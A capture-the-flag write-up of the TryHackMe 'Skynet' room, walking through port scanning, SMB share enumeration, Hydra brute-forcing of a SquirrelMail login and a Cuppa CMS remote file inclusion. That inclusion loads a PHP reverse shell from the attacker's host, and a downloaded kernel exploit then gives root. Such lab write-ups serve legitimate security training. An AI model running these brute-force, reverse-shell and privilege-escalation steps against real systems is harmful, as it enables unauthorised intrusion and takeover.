Skynet WriteUp
by Zebra
| Room | Date | Difficulty | Type | Time | Own Intention | Machine |
|---|---|---|---|---|---|---|
| Skynet | 06.11.2020 | Easy | Challenge | 1,5h | Easy | Linux |
Tasks
| Task | Question |
|---|---|
| Task 1.1 | What is Miles password for his emails? |
| Task 1.2 | What is the hidden directory? |
| Task 1.3 | What is the vulnerability called when you can include a remote file for malicious purposes? |
| Task 1.4 | What is the user flag? |
| Task 1.5 | What is the root flag? |
Introduction
Hello and welcome to the write-up of the room “Skynet” on tryhackme.
Skynet is a room marked as easy. We have to enumerate smb and bruteforce an email webserver by hydra. In my opinion its a cools room for learning the smb and hydra syntax.
So let’s begin:
Preparation Steps
Scanning and Enumeration
Lets begin with a simple nmap only portscan and sort with a grep command
Nmap Scan
- Check all open ports
- Get a list with the open ports
- Run a nmap scan on the ports
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
nmap -Pn -oN ./nmap/Pn 10.10.10.190 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-06 19:11 CET
Nmap scan report for skynet.thm (10.10.10.190)
Host is up (0.059s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
cat ./nmap/Pn |grep open | awk -F/ '{print $1}' ORS=','
22,80,110,139,143,445,
Now we can use this little Portscan to scan the Ports fully.
nmap -A -T4 -p 22,80,110,139,143,445 $targetIP
Our output shows us the following results:
| Port | Service | Information’s |
|---|---|---|
| 22/tcp | ssh | OPEN SSH 7.2p2 Ubuntu |
| 80/tcp | http | Apache 2.4.18 Webserver Ubuntu |
| 110/tcp | pop3d | |
| 139/tcp | samba | smbd 3.X - 4.X (workgroup: WORKGROUP) |
| 143/tcp | imap | Dovecot imapd |
| 445/tcp | samba | smbd 4.3.11-Ubuntu |
Samba Enumeration
Get information’s about the smb service by using nmap scripts or smbclient.
I cut some information’s out of the nmap output!
Nmap Scripts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse -oN ./nmap/smb 10.10.10.190
Starting Nmap 7.91 ( https://nmap.org ) at 2020-10-30 09:21 CET
Nmap scan report for skynet.thm (10.10.10.190)
Host is up (0.049s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.190\IPC$:
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.190\anonymous:
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.190\milesdyson:
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.190\print$:
| Anonymous access: <none>
|_ Current user access: <none>
| smb-enum-users:
| SKYNET\milesdyson (RID: 1000)
| Full name:
| Description:
|_ Flags: Normal user account
SMB client enumeration
1
2
3
4
5
6
7
8
9
10
11
smbclient -L 10.10.10.190 130 ⨯
Enter WORKGROUP\kali's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Inspect SMB shares
1
2
3
4
5
6
7
8
9
smbclient //$target/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 18 06:41:20 2019
.. D 0 Tue Sep 17 09:20:17 2019
attention.txt N 163 Wed Sep 18 05:04:59 2019
logs D 0 Wed Sep 18 06:42:16 2019
books D 0 Wed Sep 18 06:40:06 2019
Download attention.txt and /logs/log1.txt”
smbget -R smb://10.10.248.210/anonymous # for download all the files
Download the file
1
2
3
4
5
6
7
smbclient //$target/anonymous
Enter WORKGROUP\kali's password:
Try "help" to get a list of possible commands.
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt
smb: \> get \logs\log1.txt
getting file \logs\log1.txt of size 471 as \logs\log1.txt
In the attention.txt you will get a hint for a possible username.
And log1.txt will show some passwords.
So lets create two files. One called usernames.txt and another one passwords.txt Fill the files with the data you found.
What we get:
| filename | information |
|---|---|
| attention.txt | possible username |
| log1.txt | password list |
Email / Http Enumeration
Dirsearch / Find the email login path
We know that a Email Service is running, but we don’t have any login pages.
So lets check out the http service on Port 80.
We use dirsearch this time. Link
python3 ~/tools/dirsearch/dirsearch.py -u http://10.10.10.190 -e html,php,txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
python3 ~/tools/dirsearch/dirsearch.py -u http://10.10.10.190 -e html,php,txt
_|. _ _ _ _ _ _|_ v0.4.0
(_||| _) (/_(_|| (_| )
Extensions: html, php, txt | HTTP method: GET | Threads: 20 | Wordlist size: 7941
Error Log: /home/kali/tools/dirsearch/logs/errors-20-11-06_19-38-26.log
Target: http://10.10.10.190
Output File: /home/kali/tools/dirsearch/reports/10.10.10.190/_20-11-06_19-38-26.txt
[19:38:26] Starting:
[19:38:37] 301 - 312B - /admin -> http://10.10.10.190/admin/
[19:38:44] 301 - 313B - /config -> http://10.10.10.190/config/
[19:38:45] 301 - 310B - /css -> http://10.10.10.190/css/
[19:38:49] 200 - 523B - /index.html
[19:38:50] 301 - 309B - /js -> http://10.10.10.190/js/
[19:38:57] 301 - 319B - /squirrelmail -> http://10.10.10.190/squirrelmail/
Task Completed
We found our mail-service on http://10.10.10.190/squirrelmail/.
When we enter “http://10.10.10.190/squirrelmail/ in our browser we get directed to “http://10.10.10.190/squirrelmail/src/login.php.
Bruteforce Email Login
Now we can bruteforce for Task 1. Lets use Hydra for this.
login.php
hydra -l milesdyson -P passwords.txt 10.10.10.190 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect." -V -F
or the redirect.php
hydra -l milesdyson -P passwords.txt 10.10.10.190 http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect." -V -F
If you wanna use a username list change in hydra syntax -l milesdyson with -L user.txt
How do i get this syntax?
First use hdyra -h or hydra man.
Second step is to check the source code manually or use burp the find the login syntax. At line 55 and 60 in the source code you will find the login and password syntax.
Credentials: We have a passwords list and a username from the SMB enumeration “milesdyson” If we don’t have any clear usernames we could build a username list by ourselves. (miles, dyson, milesdyson, dysonmiles, mdyson, dysonm)
Burp Output. Last line!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /squirrelmail/src/redirect.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: http://10.10.10.190
Connection: close
Referer: http://10.10.10.190/squirrelmail/src/login.php
Cookie: squirrelmail_language=deleted; SQMSESSID=ik8u37odqjmoq77h0kspt2g3n0; PHPSESSID=q3ukqje9lue7hp9a23hg0rise5
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
login_username=test&secretkey=test&js_autodetect_results=1&just_logged_in=1
Hydra output:
1
[80][http-post-form] host: 10.10.10.190 login: milesdyson password: cyborg00*********
### Task 1.1 solved ###
Email inspection
Check out the infos you get from the email account.
Take the password for the smb.
Login with the smb credentials:
smbclient //$target/milesdyson -U milesdyson
Find the File with the hidden directory info.
CMS /45****
### Task 1.2 solved ###
New Web enumeration
Dirsearch
python3 ~/tools/dirsearch/dirsearch.py -u http://10.10.128.36/45**********/ -e html,php,txt
-> Find new Subdirectory/admini*****
CUPA CMS Exploitation
Visit the new URL and check source code. Nothing about a version.
Let’s check it with searchsploit.
1
2
3
4
5
6
7
8
searchsploit cuppa
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt
-------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Looks at the file searchsploit -x php/webapps/25971.txt or download it to the current folder searchsploit -m php/webapps/25971.txt
Check out the txt file and get infos about the exploit.
### Task 1.3 solved ###
Remote file inclusion
Example:
http://10.10.128.36/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
-> Checkout the system an get a php.reverse shell running
Php reverse shell
Get the code for a php.reverse shell from google Pentestmonkey and save the rev.php locally (change $IP and $Port).
The start a python http server and get a connection via the remote file inclusion.
Don’t forget to start a listener (nc -lvpn $port).
http://10.10.128.36/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.14.2.242:4444/shell.php
Priv. Escalation
Shell upgrade
python -c 'import pty;pty.spawn("/bin/bash")',
` ctl+Z, stty raw -echo; fg, “enter” + “enter”, export TERM=xterm-256color`.
Manual system enumeration
- Get infos:
cat /proc/version,uname -a,idandcat /etc/passwd.
With this commands your get basic infos of the system.
- Check basic priv esc:
cat /etc/crontab,sudo -l,histroy,find / -perm -u=s -type f 2>/dev/nullandfind / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
www-data@skynet:/$ cat /proc/version
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
www-data@skynet:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@skynet:/$ uname -a
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@skynet:/$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@skynet:/$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.cifs
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/su
/bin/ping6
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/newuidmap
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
www-data@skynet:/$ find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
-> Nothing really interesting.
When i get infos like this i check the kernel for exploits and get lineeas ready for uploading.
Linpeas
Upload:
cd /tmp
wget http://$local-ip:$port/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee lin.log
Kernel Exploitation
@Kali System
1
2
3
4
5
6
7
8
9
searchsploit kernel 4.8.0
------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel 4.8.0-22/3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference | linux/dos/40762.c
Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation | linux/local/47168.c
Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation | linux/local/41994.c
When you get a lot of output, filter it like my output. Check for Version and “what to do”. So I choose Version 4.8.0 and “Privilege Escalation”
searchsploit -m linux/local/41994.c # copy the exploit to the current location
subl 41994.c # Open the exploit in a editor of your choice and the what the exploit will do or how to run.
Priv Esc installation
1
2
3
4
5
6
7
8
9
Usage:
// user@ubuntu:~$ uname -a
// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
// user@ubuntu:~$ whoami
// user
// user@ubuntu:~$ id
// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
// user@ubuntu:~$ gcc pwn.c -o pwn
// user@ubuntu:~$ ./pwn
Webserver:
@ local: Start a python http server at port 4444: python -m SimpleHTTPServer $port
Upload:
@ target: cd /tmp/, ls -la, wget http://tun0-ip-local:5555/41994.c, ls -la and chmod +x 41994.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
wget http://10.14.2.242:5555/privesc.c
--2020-11-07 10:05:44-- http://10.14.2.242:5555/privesc.c
Connecting to 10.14.2.242:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24033 (23K) [text/plain]
Saving to: 'privesc.c'
privesc.c 100%[===================>] 23.47K 81.5KB/s in 0.3s
2020-11-07 10:05:52 (81.5 KB/s) - 'privesc.c' saved [24033/24033]
www-data@skynet:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@skynet:/tmp$ chmod +x privesc.c
www-data@skynet:/tmp$ gcc privesc.c -o pwn
www-data@skynet:/tmp$ ./pwn
[.] starting
[.] checking distro and kernel versions
[.] kernel version '4.8.0-58-generic' detected
[~] done, versions looks good
[.] checking SMEP and SMAP
[~] done, looks good
[.] setting up namespace sandbox
[~] done, namespace sandbox set up
[.] KASLR bypass enabled, getting kernel addr
[~] done, kernel text: ffffffff8ae00000
[.] commit_creds: ffffffff8aea5d20
[.] prepare_kernel_cred: ffffffff8aea6110
[.] SMEP bypass enabled, mmapping fake stack
[~] done, fake stack mmapped
[.] executing payload ffffffff8ae17c55
[~] done, should be root now
[.] checking if we got root
[+] got r00t ^_^
root@skynet:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@skynet:/tmp#
ROOOOOOT!!!! locate root.txt cat /root/root.txt
What we learned:
- Nmap simple port scan with get a port list with grep,awk etc…
- Samba enumeration
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse,smbclient -L $target - Samba download
smbget -R smb://10.10.248.210/anonymous - Hydra syntax for web login brute-forcing
- Manual privesc researching
- Kernel exploting with gcc